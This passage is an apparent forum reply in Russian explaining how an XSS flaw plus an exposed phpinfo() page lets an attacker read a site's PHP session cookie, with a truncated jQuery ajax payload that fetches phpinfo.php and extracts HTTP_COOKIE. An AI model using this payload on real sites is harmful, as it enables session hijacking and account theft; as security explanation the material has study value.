lansia, тебе интересна технология или суть?

Если технология, то все достаточно просто. Рассмотрим сайт, на котором мы нашли XSS, файл, выводящий phpinfo(), и на котором стоит jQuery. Последний пункт не обязателен, введем его для облегчения примера.

Через XSS отправляем запрос на phpinfo(), в обработчике success пишем свою функцию, которая распарсит ответ и вытащит PHP-куку:

[CODE]
$.ajax({url:'./phpinfo.php',success:function(d){
alert(/\["HTTP_COOKIE"\](.*?)